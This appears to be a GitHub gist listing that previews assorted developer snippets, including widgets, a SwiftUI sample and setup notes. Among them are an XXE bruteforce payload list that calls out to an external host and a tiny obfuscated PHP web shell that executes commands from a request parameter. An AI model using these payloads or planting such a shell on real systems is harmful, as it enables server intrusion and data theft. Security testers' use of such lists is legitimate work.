Skip to content

Instantly share code, notes, and snippets.

View duraki's full-sized avatar

duraki

206 followers · 2.3k following
View GitHub Profile
@kconner
kconner / macOS Internals.md
Last active April 24, 2025 10:08
macOS Internals

macOS Internals

Understand your Mac and iPhone more deeply by tracing the evolution of Mac OS X from prelease to Swift. John Siracusa delivers the details.

Starting Points

How to use this gist

You've got two main options:

@joshdholtz
joshdholtz / ATinySampleApp.swift
Last active February 12, 2025 13:48
Super basic SwiftUI app (70 lines of code) with paywall using RevenueCat
import SwiftUI
import RevenueCat
struct Constants {
static let apiKey = "<your_api_key>" // Will look like: appl_bunchofotherstuffhere
static let entitlementName = "<your_entitlement_name>" // I use something like "pro"
}
@main
struct ATinySampleApp: App {
@Alienmario
Alienmario / mi_home_external_automation.md
Last active February 6, 2025 14:54
Mi home external automation (Non rooted, Android 11)
  1. Create a manual scene in Mi Home for the device you'd like to control
  2. Use Http Toolkit to figure out the scene id.
    • Install the app on PC and Android, follow the instructions - install CA certificate and connect
    • Set to only intercept the Mi home app
    • While snooping, start the scene in Mi home, then you can disconnect http toolkit
    • Look for this request: https://de.api.io.mi.com/app/scene/start
    • The request body should look like this (actual values replaced with *) data=*&rc4_hash__=*&signature=*&_nonce=*&ssecurity=*
    • You will need the values for data, nonce and ssecurity. Run each one by https://www.urldecoder.org/.
@mountbatt
mountbatt / ZOE-Widget.js
Last active February 21, 2025 08:28
Scriptable iOS widget that displays the status of your Renault ZOE (or Megane, Dacia Spring) on your iPhone and iPad.
// Variables used by Scriptable.
// These must be at the very top of the file. Do not edit.
// icon-color: light-gray; icon-glyph: car;
// version 2024-04-19
// latest changes:
// new kameron api key
// added language strings so you can translate it by yourself!
// add your my-renault account data:
// let myRenaultUser = "user" // email
@Sillium
Sillium / telekom.js
Last active January 15, 2025 05:41
const apiUrl = "https://pass.telekom.de/api/service/generic/v1/status"
let widget = await createWidget()
widget.backgroundColor = new Color("#777777")
if (!config.runsInWidget) {
await widget.presentSmall()
}
Script.setWidget(widget)
Script.complete()
@ruandre
ruandre / win10-11.md
Last active April 12, 2025 06:09
After installing Windows 10/11

🪟 After installing Windows 10/11

Install

You can use https://uupdump.net/ to build up an ISO file (even from Linux or Mac, the options enable you to keep the file size down) and just drop into https://github.com/ventoy/Ventoy and you're good to go.

If you're already running Windows you can do ⊞ Win, Reset this PC for a more convenient ISO download option.

For keys try https://www.microsoft.com/windows/get-windows-11 or local retail store, otherwise check PC Hardware channels on YouTube as they often have links to discounted keys (obviously check if valid/legit, due diligence, etc.)

@honoki
honoki / xxe-payloads.txt
Last active November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@terjanq
terjanq / rev_shell.php
Last active December 27, 2024 14:54
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@fattredd
fattredd / GPMplaylistDL.py
Last active May 18, 2020 23:46
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
This is a little script to download every song from every playlist
if your Google Play Music account. Songs are organized as follows:
<playlist>/<artist>/<album>/<song>.mp3
I Highly recomend putting this file in your %USER%\Music folder
before running.
@vcarl
vcarl / questions-for-your-interviewer.md
Last active April 8, 2025 12:43

I bundled these up into groups and wrote some thoughts about why I ask them!

If these helped you, I'd love to hear about it!! I'm on twitter @vcarl_ or send me an email [email protected]

Onboarding and the workplace

https://blog.vcarl.com/interview-questions-onboarding-workplace/

  • How long will it take to deploy my first change? To become productive? To understand the codebase?
  • What kind of equipment will I be provided? Will the company pay/reimburse me if I want something specific?